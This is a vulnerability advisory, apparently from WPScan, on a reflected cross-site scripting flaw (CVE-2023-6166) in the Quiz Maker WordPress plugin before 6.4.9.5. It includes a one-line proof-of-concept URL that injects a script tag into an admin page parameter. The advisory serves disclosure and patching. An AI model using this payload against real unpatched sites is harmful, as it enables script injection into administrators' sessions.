WordPress Plugin Vulnerabilities

Quiz Maker < 6.4.9.5 - Reflected Cross-Site Scripting

Description

The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

Visit the following URL:

https://example.com/wp-admin/admin.php?page=quiz-maker-questions&fake%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E=something

Affects Plugins

Plugin icon
quiz-maker
Fixed in 6.4.9.5

References

CVE
CVE-2023-6166

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
https://wpscan.com
Verified
Yes
WPVDB ID
e6155d9b-f6bb-4607-ad64-1976a8afe907

Timeline

Publicly Published
2023-11-30 (about 5 months ago)
Added
2023-11-30 (about 5 months ago)
Last Updated
2023-11-30 (about 5 months ago)

Other

Published
Title
Published
2021-08-04
Title
WP Customize Login <= 1.1 - Authenticated Stored Cross-Site Scripting (XSS)
Published
2024-05-14
Title
Simple Ajax Chat < 20240412 - Admin+ Stored XSS
Published
2021-09-09
Title
Feedify Web Push Notifications < 2.1.9 - Reflected Cross-Site Scripting
Published
2023-05-09
Title
Vertical Image Slider < 1.2.17 - Reflected XSS
Published
2015-05-03
Title
WeeklyNews Premium Theme < 2.2.9 - Cross-Site Scripting (XSS)